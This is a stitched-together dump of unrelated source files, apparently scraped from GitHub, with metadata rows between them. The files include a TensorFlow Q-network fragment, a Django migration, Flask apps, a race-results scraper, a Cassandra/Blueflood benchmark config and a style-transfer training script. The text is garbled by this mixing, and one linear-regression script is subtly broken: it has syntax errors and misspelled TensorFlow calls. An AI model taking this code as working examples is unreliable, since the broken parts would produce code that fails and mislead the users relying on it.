with tf.variable_scope('conv_layer_{}'.format(i + 1), reuse=reuse):
window_size = window_size - self.params.kernel_sizes[i] + 1
# feed the inputs to a convolutional layer
inputs = self.conv2d_layer(inputs, self.params.filter_sizes[i],
self.params.kernel_sizes[i],
self.params.padding,
'conv_{}'.format(i + 1),
reuse,
activation=tf.nn.relu)
# feed the output of the previous convolutional layer to a dropout layer
inputs = self.dropout_layer(inputs,
self.params.dropoutkeepprobs.conv_keep_prob,
'dropout_conv_{}'.format(i + 1),
is_conv=True)
if self.params.padding == 'VALID':
inputs = tf.reshape(inputs,
shape=[
self.batch_size,
self.params.split_size,
window_size * self.params.filter_sizes[-1]
]
)
else:
inputs = tf.reshape(inputs,
shape=[
self.batch_size,
self.params.split_size,
self.params.window_size * self.params.filter_sizes[-1]
]
)
# GRUs: Gated recurrent units, do not have an output gate
# similar to LSTM: long short-term memory, have an output gate
gru_cells = [] # create a list of gru cells, with a length of (gru_num_cells-1)
for i in range(0, self.params.gru_num_cells):
cell = tf.nn.rnn_cell.GRUCell( # do not have an output gate
num_units=self.params.gru_cell_size, # size of output of one cell
reuse=reuse # whether to reuse variables in an existing scope
)
# details: https://arxiv.org/abs/1512.05287
# Create a cell with added input, state, and output dropout
# State dropout is performed on the outgoing states of the cell
cell = tf.nn.rnn_cell.DropoutWrapper(
cell,
output_keep_prob=self.params.dropoutkeepprobs.gru_keep_prob,
variational_recurrent=True, # the same dropout mask is applied at every step (input, state, and output)
dtype=tf.float32 # The dtype of the input, state, and output tensors. Required and used iff variational_recurrent = True
)
gru_cells.append(cell)
# Create a RNN cell composed sequentially of a number of RNNCells
# accepted and returned states are n-tuples, where n = len(cells) = gru_num_cells
multicell = tf.nn.rnn_cell.MultiRNNCell(cells = gru_cells)
# create a RNN layer named 'dynamic_unrolling' in the computational graph
with tf.name_scope('dynamic_unrolling'):
# Creates a recurrent neural network specified by 'cell'
output, final_state = tf.nn.dynamic_rnn(
cell=multicell,
inputs=inputs,
dtype=tf.float32
)
# shape of the output: [batch_size, gru_cell_size, gru_num_cells]
# the outputs of the last RNN state in the order of the gru cells
output = tf.unstack(output, axis=1)[-1]
# only take the last output tensor
# shape of the output tensor: [batch_size, gru_num_cells]
'''
Append the information regarding the number of trades left in the episode
'''
# trade_rem = state[1]: trades remaining in the episode
trade_rem = tf.expand_dims(trade_rem, axis=1)
# shape of trade_rem: [batch_szie, 1] ?
output = tf.concat([output, trade_rem], axis=1)
# shape of the output: [batch_size, gru_num_cells + 1] ?
# create a new set of layers named 'fully_connected' in the computational graph
with tf.variable_scope('fully_connected', reuse=reuse):
num_dense_layers = len(self.params.dense_layer_sizes)
for i in range(0, num_dense_layers):
with tf.variable_scope('dense_layer_{}'.format(i + 1), reuse=reuse):
# create a new layer with 1 dense layer and 1 dropout layer
output = self.dense_layer(output, self.params.dense_layer_sizes[i],
'dense_{}'.format(i + 1), reuse, activation=tf.nn.relu)
output = self.dropout_layer(output,
self.params.dropoutkeepprobs.dense_keep_prob,
'dropout_dense_{}'.format(i + 1))
# the output layer
self._values = self.dense_layer(output, self.params.num_actions, 'q_values', reuse)
# shape of the output: [batch_size, num_actions]
with tf.name_scope('avg_q_summary'):
# compute the average among the Q values of each data
avg_q = tf.reduce_mean(self._values, axis=0)
self._avg_q_summary = []
for idx in range(self.params.num_actions):
self._avg_q_summary.append(tf.summary.histogram('q/{}'.format(idx), avg_q[idx]))
self._avg_q_summary = tf.summary.merge(self._avg_q_summary, name='avg_q_summary')
# Returns the index with the largest value across dimensions of a tensor
self._action = tf.argmax(self._values, dimension=1, name='action')
# a 1d list with length batch_size
| [
"noreply@github.com"
] | chpark17.noreply@github.com |
be03e65bb1bd8709380574f85dccabf81c26111e | 70626b98af60711d90b123b6794d865aa18188c2 | /bin/salt-ec2 | 95ca4f247ee1570a02ae3d18ae948eedc440c04b | [] | no_license | svanderbleek/salt-ec2 | 0baaac6e901c6b19023207f3b36c6b750fb5c7e6 | 334c159e675dc51f24940bde4e6ebfc3b626151a | refs/heads/master | 2021-01-20T02:47:50.053971 | 2014-05-06T05:42:55 | 2014-05-06T05:42:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/usr/bin/env python3
import sys
print(sys.path)
from optparse import OptionParser
from list import list
COMMAND = 0
LIST = 'list'
parser = OptionParser()
options, arguments = parser.parse_args()
if arguments[COMMAND] == LIST:
print(list())
| [
"sandy.vanderbleek@gmail.com"
] | sandy.vanderbleek@gmail.com | |
8180fbd10f5256573414b21160903a875eff5713 | 460e0437f27d907a176db5cd48747fd81641e5d2 | /blog/blog_main/migrations/0007_auto_20180311_0950.py | 9db0bee0d0e59548562e904b571d4d8a143da862 | [] | no_license | lmishra92/trial-blog | 0204093174854b8fd7eb4b7c871ead5628ae9389 | 958495518965ac74aeb38d4736784daf847269a9 | refs/heads/master | 2020-03-08T19:52:20.257696 | 2018-04-06T08:14:10 | 2018-04-06T08:14:10 | 128,366,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | # Generated by Django 2.0.3 on 2018-03-11 09:50
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blog_main', '0006_auto_20180311_0941'),
]
operations = [
migrations.AlterField(
model_name='post',
name='publish',
field=models.DateTimeField(default=datetime.datetime(2018, 3, 11, 9, 49, 41, 910480, tzinfo=utc)),
),
]
| [
"leninmishra@Lenins-MacBook-Pro.local"
] | leninmishra@Lenins-MacBook-Pro.local |
91e4edc5e3f39d47b5755501b164a77c38a958c6 | 4f5992128863f14cde2fb288b565f5876a93ed74 | /Linearregression.py | d62f82f36da7f794a60995b644d1bc04e6ab35cf | [] | no_license | SAdiA259/TensorFlow-sales-price-prediction | 1e077d9e202f8ac01dfc33eafea2585934003a79 | 566decb7d711b5d324b2be70935c835201fa8bd7 | refs/heads/master | 2020-04-02T18:07:55.576118 | 2018-10-25T14:43:51 | 2018-10-25T14:43:51 | 154,687,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,847 | py | ## linear regression
## housing pricing based on square footage and price
import tensorflow as tf
import numpy as np
#########################
def inference(x):
W=tf.variable(tf.zeros([1,1])
b=tf.variable(tf.zeros([1])) #we only have X1 so only w1
y=tf.matmul(W, x) + b
return y
############################
def loss(y,y_):
cost=tf.reduce_sum(tf.pow( (y_ - y), 2 ))
return cost
#############################
def training():
train_step=tf.train.GradeintDescentOptimizer(0.00001).minimize(cost) ## minimize cost
return train_step
###############################
def evaluate(y,y_):
correct_prediction=y
float_val=tf.cast(correct_prediction, tf.float32) ###3converting to float
return float_val
#################################
##y=w1x1+b
x=tf.placeholder(tf.float32, [None,1]) ##only square footage
y_=tf.placeholder(tf.float32, [None,1]) #actual
y= inference(x) # predicted one with x =data
cost=loss(y, y_) #compare real and pedicted
train_step=training(cost)
eval_op=evaluate(y,y_)
#####################################
init=tf.initialize_all_variables()
sess=tf.session()
session.run(init) ### all variables get initialized
######################################33333
###training model
steps=100
for i in range(steps):
xs=np.array([[i]]) ## house size
ys=np.array([[5*i]]) ## house price 5 times house size
feed ={x:xs, y_:ys}
sess.run(train_step, feed_dict=feed)
##################################3
### testing model
for i in range(100,200):
xs_test=np.array([[i]]) ## house price
ys_test=np.array([[2*i]]) ## if testing correctly it should predict 500 - 1000
feed_test={x:xs_test, y_:ys_test}
result=sess.run(eval_op, feed_dict = feed_test)
print "Run {},{}".format(i, result)
r=raw_input
| [
"noreply@github.com"
] | SAdiA259.noreply@github.com |
f9fc3d814e724c65a64fff06d24280e15556de5e | 296fbb93183c61bf67731237db84969717333dff | /app/auth/email.py | dfda10f6a108ed645f60dfee4dbbf07b51d867b3 | [] | no_license | LeviFriley/melly | 5df0cb517e3797df0dd04858c900ea8fa5fef78b | d005dae71b5d9f5bbcfbc64f67572c720ac23d70 | refs/heads/master | 2020-04-12T00:47:23.301364 | 2018-12-18T01:31:49 | 2018-12-18T01:31:49 | 162,212,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | from flask import render_template, current_app
from app.email import send_email
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Microblog] Reset Your Password',
sender=current_app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token)) | [
"JMILLER@ad.hc-sc.gc.ca"
] | JMILLER@ad.hc-sc.gc.ca |
183ff6a161b4d65edd2fa062a2d549ba9b3d089f | 6d8e97eda1aa4d64f38f4812ed49785b54db1108 | /P3LAB_ Brower.py | 4cef93d98fc070a25766ecf8a5241ae1aad54534 | [] | no_license | browerd0686/CTI110 | 7f5c457f86576a67841538515cfd8de49538adb3 | 26d46d36c70d9e67aa4079733001c706c77eb097 | refs/heads/master | 2020-06-09T08:52:40.027427 | 2019-07-18T04:51:29 | 2019-07-18T04:51:29 | 193,412,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | #CTI-110
#P3HW2-MealTipTax
#Darrius Brower
#July 1, 2019
def main():
# This program takes a number grade and outputs a letter grade.
# system uses 10-point grading scale
A_score = 90
B_score = 80
C_score = 70
D_score = 60
score = int(input('Enter grade: '))
if score >= A_score:
print('Your grade is: A')
else:
if score >= B_score:
print('Your grade is: B')
else:
if score >= C_score:
print('Your grade is: C')
else:
if score >= D_score:
print('Your grade is: D')
else:
print('Your grade is: F')
# program start
main()
| [
"noreply@github.com"
] | browerd0686.noreply@github.com |
23dc496b373f870ec52009d414579d71d99fa082 | 8807958eab34f289cc8b1b07e180af757bde7124 | /design2/test_LineClassifier.py | 75cb3a10fcec6095c64c62655aa304d8f43531da | [
"BSD-2-Clause"
] | permissive | davidjamesbeck/IJAL-interlinear | 4f34cbb8626403f7bc52db96f0349d10ca2ce674 | cb5dbb1d6aea98cce76668aa868a9189f31baf3f | refs/heads/master | 2020-03-30T11:00:46.001171 | 2018-10-01T13:50:02 | 2018-10-01T13:50:02 | 151,148,840 | 0 | 0 | BSD-2-Clause | 2018-10-01T19:45:38 | 2018-10-01T19:45:37 | null | UTF-8 | Python | false | false | 3,028 | py | import re
import sys
import unittest
from Line import *
from LineClassifier import *
import importlib
pd.set_option('display.width', 1000)
import pdb
def runTests():
test_recognizeDegenerateLine()
test_recognizeCanonicalLine()
test_recognizeWordsAsElementsLine()
test_MonkeyAndThunder_allLinesRecognized()
test_LOKONO_allLinesRecognized()
def test_recognizeDegenerateLine():
"""
MonkeyAndThunder starts off with a few introductory lines in Spanish, with English translation.
No words, no glosses, just a line with time slots, and one child
"""
print("--- test_recognizeDegenerateLine")
filename = "../testData/monkeyAndThunder/AYA1_MonkeyandThunder.eaf"
xmlDoc = etree.parse(filename)
x0 = Line(xmlDoc, 0)
assert(x0.getTierCount() == 2)
classifier = LineClassifier(x0.getTable())
assert(classifier.run() == "DegenerateLine")
def test_recognizeCanonicalLine():
"""
MonkeyAndThunder line 6 fits the canonical form:
1) a time line
"""
print("--- test_recognizeCanonicalLine")
filename = "../testData/monkeyAndThunder/AYA1_MonkeyandThunder.eaf"
xmlDoc = etree.parse(filename)
x = Line(xmlDoc, 6)
assert(x.getTierCount() == 4)
classifier = LineClassifier(x.getTable())
assert(classifier.run() == "CanonicalLine")
def test_recognizeWordsAsElementsLine():
"""
LOKONO has the canonical spokenText tier, its translation, but each word in the
spokenText is its own element, each with two children: morpheme and gloss
"""
print("--- test_recognizeWordsAsElementsLine")
filename = "../testData/LOKONO_IJAL_2.eaf"
xmlDoc = etree.parse(filename)
x = Line(xmlDoc, 1)
# print(x.getTable())
assert(x.getTierCount() == 20)
classifier = LineClassifier(x.getTable())
assert(classifier.run() == "WordsAsElementsLine")
def test_MonkeyAndThunder_allLinesRecognized():
print("--- test_MonkeyAndThunder_allLinesRecognized")
filename = "../testData/monkeyAndThunder/AYA1_MonkeyandThunder.eaf"
xmlDoc = etree.parse(filename)
lineCount = len(xmlDoc.findall("TIER/ANNOTATION/ALIGNABLE_ANNOTATION"))
assert(lineCount == 41)
for i in range(lineCount):
x = Line(xmlDoc, i)
classifier = LineClassifier(x.getTable())
classification = classifier.run()
#print("%d: %s" % (i, classification))
assert(classification in ["DegenerateLine", "CanonicalLine"])
def test_LOKONO_allLinesRecognized():
print("--- test_LOKONO_allLinesRecognized")
filename = "../testData/LOKONO_IJAL_2.eaf"
xmlDoc = etree.parse(filename)
lineCount = len(xmlDoc.findall("TIER/ANNOTATION/ALIGNABLE_ANNOTATION"))
assert(lineCount == 344)
for i in range(lineCount):
x = Line(xmlDoc, i)
classifier = LineClassifier(x.getTable())
classification = classifier.run()
#print("%d: %s" % (i, classification))
assert(classification in ["WordsAsElementsLine"])
#x = Line(xmlDoc, 28)
#x.getTable()
| [
"paul.thurmond.shannon@gmail.com"
] | paul.thurmond.shannon@gmail.com |
f82142f8ab4d086608ecc4d6aacb5d1a406d734f | 82876a61eea81cff32645c1710b782f517ce5e39 | /web_flask/6-number_odd_or_even.py | ba38024d292c8da1559824b9993e033dba02bd19 | [] | no_license | fabo893/AirBnB_clone_v2 | 40f0b98b3adf9d30f2e4463e7cf6d98c9ba570a8 | 4291a545f5000634fb5cb869622fc5304cb16a07 | refs/heads/master | 2023-04-30T14:04:47.988445 | 2021-05-06T04:03:54 | 2021-05-06T04:03:54 | 352,668,747 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | #!/usr/bin/python3
"""
Hello Flask!
"""
from flask import Flask
from flask import render_template
app = Flask(__name__)
app.url_map.strict_slashes = False
@app.route('/')
def hello():
""" Hello method """
return "Hello HBNB!"
@app.route('/hbnb')
def hello123():
""" Second hello method """
return "HBNB"
@app.route('/c/<text>')
def cprint(text):
""" Display C with text """
text = text.replace("_", " ")
return "C {}".format(text)
@app.route('/python/', defaults={'text': 'is cool'})
@app.route('/python/<text>')
def pythonprint(text):
""" Display Python with text """
if len(text) > 0:
text = text.replace("_", " ")
return "Python {}".format(text)
@app.route('/number/<int:n>')
def number(n):
return "{} is a number".format(n)
@app.route('/number_template/<int:n>')
def html(n):
""" If is number display HTML """
return render_template('5-number.html', n=n)
@app.route('/number_odd_or_even/<int:n>')
def noddeven(n):
""" If is number display HTML """
return render_template('6-number_odd_or_even.html', n=n)
if __name__ == "__main__":
app.run(debug=True)
| [
"jose.rosa893@gmail.com"
] | jose.rosa893@gmail.com |
c8993094f9d2a2dc0b4efbab9bd24ba07604c836 | 100b1c92f183f73587333e47b8f9b81549af506c | /py/9-bsk-vol.py | 4eef3170a9fd0f1b2a2a034359c914adcb33528c | [] | no_license | jacob-vintercapital/finplot | 0f437036c0ed0df9a7753cbe0b4145af0af2e229 | dbfc7b04e6af020b5b215df82ed22591dda0062d | refs/heads/master | 2020-04-13T00:54:24.367982 | 2019-01-05T09:08:01 | 2019-01-05T09:08:01 | 162,857,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | # volume over time
vol_bsk_mat = pd.concat([v1, v2,v3,v4,v5,v6,v7,v8,v9], axis=1)
vol_bsk_mat.mean()
vol_bsk_mat.std()
# probably not so much interesting to analyze here. | [
"jacob@vinter.capital"
] | jacob@vinter.capital |
336596f8b1107bad9b40d7d8cfeca12511d7e557 | 786b1022d40f380b1122bcc6643e68c7cbfc9a4a | /healthcarebooking/models/association_company_profile.py | cfee8754a049b4ebb973fa6b0e857a3184476117 | [] | no_license | pvnguyen123/healthcare-booking | 73440a872eaf4506a0c77f51b533d38ff6088a21 | 35d567b3b778b56baf669c20abeb5ba375e98fbf | refs/heads/master | 2020-03-28T19:06:04.118346 | 2019-04-28T20:15:10 | 2019-04-28T20:15:10 | 148,944,143 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | from healthcarebooking.extensions import db
from sqlalchemy import ForeignKey, Column, Integer, Enum
class AssociationCompanyProfile(db.Model):
""" Basic company and profile assosiaction
"""
__tablename__ = 'association_company_profile'
company_id = Column(Integer, ForeignKey('company.id'), primary_key=True)
profile_id = Column(Integer, ForeignKey('profile.id'), primary_key=True)
association_type = Column(Enum('admin', 'member', 'client', 'provider'))
def __repr__(self):
return f'<AssociationCompanyProfile company {self.company_id}: profile {self.profile_id}>'
| [
"hpnguyen@hpnguyen-mn2.linkedin.biz"
] | hpnguyen@hpnguyen-mn2.linkedin.biz |
463a1280db30c028900eec59f794147f96e50fbb | 680d3da3e38bb97282a3a26822a24f336874ad69 | /Generators/fibb.py | 83eb7ec4bf9cc9fa141d50eb0d224b9c871d9deb | [] | no_license | sinhasaroj/Python_programs | 9384efef26ce4e1b1e04d8725e8826120b66640a | e89148acbe852776993912e8e01b2cdc5f5bcb4c | refs/heads/master | 2023-06-14T00:17:27.354045 | 2021-06-30T19:28:52 | 2021-06-30T19:28:52 | 338,111,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | def fib_gen():
a,b = 0 ,1
while True:
yield a
a,b = b , a+b
g = fib_gen()
for x in g:
if x<10:
print(x)
else:
break
| [
"saroj.sinha@hpe.com"
] | saroj.sinha@hpe.com |
f3400af8343d019f8d5a1257bf176ef20d2d7882 | 97d85e2958de5b413202f89154f564f7c8994b83 | /springmesh/render/__init__.py | 8b04ed234af4d9c161276e2d0f67a9b01ee98f84 | [] | no_license | afcarl/pyspringmesh | ea25a943bf1e7384e888c5dc51386a03c5c9435f | 08da6bf9ca3a989829e07a190b9a34c487b0a0d3 | refs/heads/master | 2020-03-16T23:25:49.064570 | 2016-08-23T19:45:58 | 2016-08-23T19:45:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 60 | py | #!/usr/bin/env python
from . import mpl
__all__ = ['mpl']
| [
"brettgraham@gmail.com"
] | brettgraham@gmail.com |
bc4b797ce75320ec275ba50b7afce28607e27cee | d951d8c7350caf61f9dfe655e8a1a1ef49ec4a07 | /vagrant_files/generator/files/databases/blueflood_cl1_rf1.py | 0ca0de818889385b81763bf19fb873c358559e53 | [
"Apache-2.0"
] | permissive | TSDBBench/Overlord | 9e73d022a732e3a3ef0ec6e83059b3d117579c61 | d72b6927ceaf6631f5b07f411e34bec9904158c4 | refs/heads/master | 2020-04-11T08:05:32.384466 | 2019-07-14T15:50:10 | 2019-07-14T15:50:10 | 50,924,051 | 7 | 6 | null | 2017-11-27T11:34:51 | 2016-02-02T13:57:02 | Python | UTF-8 | Python | false | false | 6,363 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
__author__ = 'Andreas Bader'
__version__ = "0.01"
# db_folders -> List of DB Folder (for space check)
# db_client -> name of ycsb client
# db_args -> special ycsb arguments for this db
# db_name -> name of this db (e.g. for workload file)
# db_desc -> more detailed name/description
# jvm_args -> special jvm_args for this db and ycsb
# prerun_once -> list of commands to run local once before ycsb (%%IP%% uses first db vm) (without ycsb, sync or space diff or poweroff commands!)
# postrun_once -> list of commands to run local once after ycsb (%%IP%% uses first db vm) (without ycsb, sync or space diff or poweroff commands!)
# prerun -> list of commands to run before ycsb (all vms or local) (without ycsb, sync or space diff or poweroff commands!)
# postrun -> list of commands to run after ycsb (all vms or local) (without ycsb, sync or space diff or poweroff commands!)
# prerun_master -> list of commands to run before ycsb (only on master(first=ID 0) vm or local)) (without ycsb, sync or space diff or poweroff commands!)
# postrun_master -> list of commands to run after ycsb (only on master(first=ID 0) vm or local)) (without ycsb, sync or space diff or poweroff commands!)
# prerun_slaves -> list of commands to run before ycsb (only on slave (all without master(=ID 0)) vms or local)) (without ycsb, sync or space diff or poweroff commands!)
# postrun_slaves -> list of commands to run after ycsb (only on slave (all without master(=ID 0)) vms or local)) (without ycsb, sync or space diff or poweroff commands!)
# prerun_dict -> list of commands to run before ycsb for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)
# postrun_dict -> list of commands to run after ycsb for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)
# check -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (systemctl start xyz oftern returns true even if start failed somehow. Check that here!)
# check_master -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (only on master(first=ID 0) vm or local))
# check_slaves -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (all without master(=ID 0)) vms or local))
# check_dict -> list of commands to run after prerun for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)
# basic -> True/False, if True this is a basic database, so no need to ssh for space checking
# sequence -> which vm should be provisioned first? (for all postrun/prerun dicts/lists. First number is considered master db vm, rest are slaves.)
# include -> which base modules should be imported and added to the dictionary (standard functions that are reusable). Warning: infinite import loop possible!
# the following variables are possible in prerun_once, postrun_once, prerun, prerun_master, prerun_slaves, check, check_master, check_slaves, postrun, postrun_master, postrun_slaves, prerun_dict, postrun_dict, check_dict, db_args:
# %%IP%% -> IP of (actual) db vm
# %%IPgen%% -> IP of (actual) generator vm (on which this script runs)
# %%IPn%% -> IP of db vm number n (e.g. %%IP2%%)
# %%IPall%% -> give String with IP of all vms)
# %%HN%% -> Hostname of (actual) db vm
# %%HNgen%% -> Hostname of (actual) generator vm (on which this script runs)
# %%HNn%% -> Hostname of db vm number n (e.g. %%HN2%%)
# %%HNall%% -> give String with Hostname of all vms)
# %%SSH%% -> if SSH should be used (set at the beginning)
# Order of Preruns/Postruns:
# 1. prerun/postrun/check, 2. prerun_master/postrun_master/check_master, 3. preun_skaves/postrun_slaves/check_slaves, 4.prerun_dict/postrun_dict/check_dict
# General Order:
# prerun -> check -> ycsb -> postrun
def getDict():
dbConfig={}
dbConfig["db_folders"]=["/var/lib/cassandra"]
dbConfig["db_client"]="blueflood"
dbConfig["db_args"]="-p ip=%%IP%% -p ingestPort=19000 -p queryPort=19001"
dbConfig["db_name"]="blueflood_cl1_rf1"
dbConfig["db_desc"]="Blueflood with Cassandra together on 1 VM."
dbConfig["jvm_args"]="-jvm-args='-Xmx4096m'"
dbConfig["prerun_once"]= []
dbConfig["postrun_once"]= []
dbConfig["prerun"]= ["%%SSH%%sudo -s bash -c 'sed -i \"s|- seeds: \\\\\"127.0.0.1\\\\\"|- seeds: \\\\\"%%IP0%%\\\\\"|g\" /etc/cassandra/cassandra.yaml'",
"%%SSH%%sudo -s bash -c 'sed -i \"s|listen_address: localhost|listen_address: %%IP%%|g\" /etc/cassandra/cassandra.yaml'",
"%%SSH%%sudo -s bash -c 'sed -i \"s|rpc_address: localhost|rpc_address: %%IP%%|g\" /etc/cassandra/cassandra.yaml'",
"%%SSH%%sudo -s bash -c 'sed -i \"s|localhost|%%IP%%|g\" /home/vagrant/blueflood.conf'"]
dbConfig["postrun"]= []
dbConfig["prerun_master"]= ["%%SSH%%sudo -s bash -c 'systemctl start cassandra.service'",
"%%SSH%%sudo -s bash -c 'sleep 60'",
"%%SSH%%sudo -s bash -c 'cassandra-cli -h %%IP%% -f /home/vagrant/files/blueflood_cassandra.cli'",
"%%SSH%%sudo -s bash -c 'sleep 5'",
"%%SSH%%sudo -s bash -c 'systemctl start blueflood.service'",
"%%SSH%%sudo -s bash -c 'sleep 5'"]
dbConfig["postrun_master"]= []
dbConfig["prerun_slaves"]= []
dbConfig["postrun_slaves"]= []
dbConfig["prerun_dict"]= {}
dbConfig["postrun_dict"]= {}
dbConfig["check"]= []
dbConfig["check_master"]= ["%%SSH%%sudo -s bash -c 'exit $(systemctl status cassandra.service | grep -c \"active (exited)\")'",
"%%SSH%%sudo -s bash -c 'exit $(($(systemctl status cassandra.service | grep -c \"active (running)\")-1))'",
"%%SSH%%sudo -s bash -c 'exit $(systemctl status blueflood.service | grep -c \"active (exited)\")'",
"%%SSH%%sudo -s bash -c 'exit $(($(systemctl status blueflood.service | grep -c \"active (running)\")-1))'"]
dbConfig["check_slaves"]= []
dbConfig["check_dict"]= {}
dbConfig["basic"]= False
dbConfig["sequence"]=[0]
dbConfig["include"] = []
return dbConfig | [
"Development@Geekparadise.de"
] | Development@Geekparadise.de |
3859fc5a3b03eb2dfd040e427911496d4abbaaf1 | 009d22a0747066c265305440f135d5c429aeffe3 | /src/constants.py | d232ecdcdf765e6ba3b81f9e3dfe68600c7991e5 | [] | no_license | ekeimaja/Helikopteripeli | 936ab005a7fcf4eb5bcad296d3cdb7bb49cac837 | f3baad8b5832e74649cdc4d0a29378925afc4e2e | refs/heads/master | 2020-04-14T13:42:45.015920 | 2019-01-02T20:04:08 | 2019-01-02T20:04:08 | 163,876,587 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | # Size of the window
SCREEN_WIDTH = 1200
SCREEN_HEIGHT = 800
# Title
TITLE = "Helikopteripeli"
# Default friction used for sprites, unless otherwise specified
DEFAULT_FRICTION = 0.2
# Default mass used for sprites
DEFAULT_MASS = 1
# Gravity
GRAVITY = (0.0, -900.0)
# Player forces
SPEED = 700
# Grid-size
SPRITE_SIZE = 64
# How close we get to the edge before scrolling
VIEWPORT_MARGIN = 100
| [
"ekeimaja@gmail.com"
] | ekeimaja@gmail.com |
33d564ecf9223da57b4dcd6e298a319deba53c72 | 7686153caa2fa89945e7371730e495f7892fa098 | /10k/parser.py | 7de5f2247de7041affde5a9ea13655c6bd0163e3 | [] | no_license | kellbot/raceresults | 1c88fd913c6e514f606f04c028209d6af699d488 | db1fac0c4a2639721e6944e125e2817522bf9441 | refs/heads/master | 2021-01-25T06:36:33.330837 | 2015-01-15T14:49:10 | 2015-01-15T14:49:10 | 29,168,273 | 0 | 1 | null | 2015-01-14T21:25:56 | 2015-01-13T02:16:09 | Python | UTF-8 | Python | false | false | 673 | py | import csv
from lxml import html
import glob
import os
os.chdir('C:/Users/kellb_000/Dropbox/Hacks/Racedata/Philly10k/')
for filename in glob.glob("*.html"):
file = open(filename)
filestring = file.read()
tree = html.fromstring(filestring)
table = tree.xpath('//table[@class="results_table"]/tbody/tr')
data = list()
for row in table:
data.append([c.text_content() for c in row.getchildren()])
letter = filename[:-5]
csvfile = "C:/Users/kellb_000/Dropbox/Hacks/Racedata/Philly10k/" + letter + ".csv"
with open(csvfile, "w") as output:
writer = csv.writer(output, lineterminator='\n')
writer.writerows(data)
| [
"kellbot@gmail.com"
] | kellbot@gmail.com |
65e8c6a127e9108978754864f271acc452e47fae | 19ee9842a574b805625bd0b1f9c32c6fe13757b4 | /vgg_real_nvp_augL.py | 7a864f4c4e0144b714da15552152c5dd03f529ea | [] | no_license | gabloa/max_ent_flow_nets | cb58b21d79c3708fbe8d619f1242dc03ed8e50df | 0036440df54651de558575e7a279379040e3f1e0 | refs/heads/master | 2020-03-27T08:28:59.860834 | 2018-08-27T07:01:22 | 2018-08-27T07:01:22 | 146,259,118 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,740 | py |
# coding: utf-8
# ## MEFN with real-nvp as generative model and gramian of vgg as penalty
#
# * Note: You will need to download a pre-trained vgg network from, for example https://github.com/ry/tensorflow-vgg16/raw/master/vgg16-20160129.tfmodel.torrent, then set the vgg_path
#
# * Seems that VGG network is tailored to 224 x 224 x 3 images so for now we will just stick to that size
#
# * code for building penalty with vgg network is based on paper https://arxiv.org/abs/1603.03417, code from https://github.com/ProofByConstruction/texture-networks
#
# * code for model real-nvp is based on paper https://arxiv.org/abs/1605.08803, code from https://github.com/taesung89/real-nvp
#
# * Warning: This code is extremely slow on CPU (really slow), mostly a proof-of-concept.
import os
import sys
import time
import json
import argparse
import pickle
import numpy as np
import tensorflow as tf
sys.path.append('vgg')
sys.path.append('real_nvp')
import real_nvp.nn as real_nvp_nn # for adam optimizer
from real_nvp.model import model_spec as real_nvp_model_spec # transforming image to latent
from real_nvp.model import inv_model_jac_spec as real_nvp_inv_model_spec # transforming latent to image
from vgg.vgg_network import VGGNetwork # read vgg network and compute style and content loss
from vgg.network_helpers import load_image
#import matplotlib
#import matplotlib.pylab as plt
#get_ipython().magic(u'matplotlib inline')
#-----------------------------
# command line argument, not all of them are useful
parser = argparse.ArgumentParser()
# data I/O
parser.add_argument('-i', '--style_img_path', type=str, default='img/style.jpg', help='path for the style image')
parser.add_argument('--vgg_path', type=str, default='vgg/vgg16.tfmodel', help='path for vgg network')
parser.add_argument('-o', '--save_dir', type=str, default='/tmp/pxpp/save', help='Location for parameter checkpoints and samples')
#parser.add_argument('-d', '--data_set', type=str, default='cifar', help='Can be either cifar|imagenet')
parser.add_argument('-t', '--save_interval', type=int, default=100, help='Every how many epochs to write checkpoint/samples?')
#parser.add_argument('-r', '--load_params', type=int, default=0, help='Restore training from previous model checkpoint? 1 = Yes, 0 = No')
# optimization
parser.add_argument('--entropy', type=int, default=1, help='0 = No entropy, 1 = Decreasing penalty, -1 = Constant penalty')
parser.add_argument('-l', '--learning_rate', type=float, default=0.01, help='Base learning rate')
#parser.add_argument('-e', '--lr_decay', type=float, default=0.999995, help='Learning rate decay, applied every step of the optimization')
parser.add_argument('-b', '--batch_size', type=int, default=12, help='Batch size during training per GPU')
parser.add_argument('-a', '--init_batch_size', type=int, default=100, help='How much data to use for data-dependent initialization.')
#parser.add_argument('-p', '--dropout_p', type=float, default=0.5, help='Dropout strength (i.e. 1 - keep_prob). 0 = No dropout, higher = more dropout.')
parser.add_argument('-x', '--max_iter', type=int, default=500, help='How many epochs to run in total?')
parser.add_argument('--lam_use', type=float, default=0.99, help='lambda value when --entropy=-1')
#parser.add_argument('-g', '--nr_gpu', type=int, default=1, help='How many GPUs to distribute the training across?')
# evaluation
#parser.add_argument('--sample_batch_size', type=int, default=16, help='How many images to process in paralell during sampling?')
# reproducibility
parser.add_argument('-s', '--seed', type=int, default=1, help='Random seed to use')
# * Put the right image path to style_img_path
# * Put the downloaded vgg model to vgg_path
args = parser.parse_args()
#args = parser.parse_args(["--style_img_path=img/style.jpg",
